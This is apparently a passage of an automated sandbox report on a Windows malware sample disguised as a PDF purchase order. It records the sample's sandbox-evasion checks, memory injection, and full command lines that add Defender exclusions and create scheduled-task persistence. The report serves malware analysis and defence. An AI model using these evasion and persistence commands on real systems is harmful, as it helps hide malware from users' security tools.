                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match, File source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 1792, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595675
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593985
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3603
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4600
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 387
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Window / User API: threadDelayed 5638
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Window / User API: threadDelayed 4186
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe Window / User API: threadDelayed 3490
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe Window / User API: threadDelayed 6360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 4235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 5217
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 3595
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window / User API: threadDelayed 6197
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -593985s >= -30000s
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 922337203685477
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3854506593.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3855064839.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1618746266.00000000014AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: sgxIb.exe, 00000018.00000002.3855625299.00000000013B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Memory written: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Memory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Process created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Process created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Queries volume information: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Queries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
